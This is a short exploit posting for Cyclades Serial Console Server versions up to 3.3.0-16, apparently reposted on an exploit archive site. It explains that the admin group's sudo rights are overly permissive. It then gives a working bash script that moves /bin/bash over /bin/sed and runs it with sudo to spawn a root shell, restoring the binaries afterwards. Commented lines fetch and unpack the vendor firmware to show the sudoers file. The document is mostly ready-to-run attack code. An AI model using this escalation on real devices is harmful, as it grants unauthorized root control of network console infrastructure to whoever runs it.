Cyclades Serial Console Server 3.3.0 Exploit, Local Privilege Escalation

# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
# Date: 09 Feb 2022
# Exploit Author: @ibby
# Vendor Homepage: https://www.vertiv.com/en-us/
# Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip
# Version: Legacy Versions V_1.0.0 to V_3.3.0-16
# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)
# CVE : N/A

# The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges
## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014.
### This vulnerability does not exist in the newer distributions of the ACS Software.

#!/bin/bash

## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system.
## The software is publicly available, this will grab it and unpack the firmware for you.

#TMPDIR=$(mktemp -d)
#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin
#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers"
#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."


# ! EXPLOIT CODE BELOW ! #
# -------
# Once you exit the root shell, this will clean up and put the binaries back where they belong.
echo "Creating backups of sed & bash binaries"
sudo cp /bin/sed /bin/sed.bak
sudo cp /bin/bash /bin/bash.bak
echo "Saved as bash.bak & sed.bak"
sudo mv /bin/bash /bin/sed
sudo /bin/sed
echo "Replacing our binary with the proper one"
sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed

All rights reserved nPulse.net 2009 - 2022
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD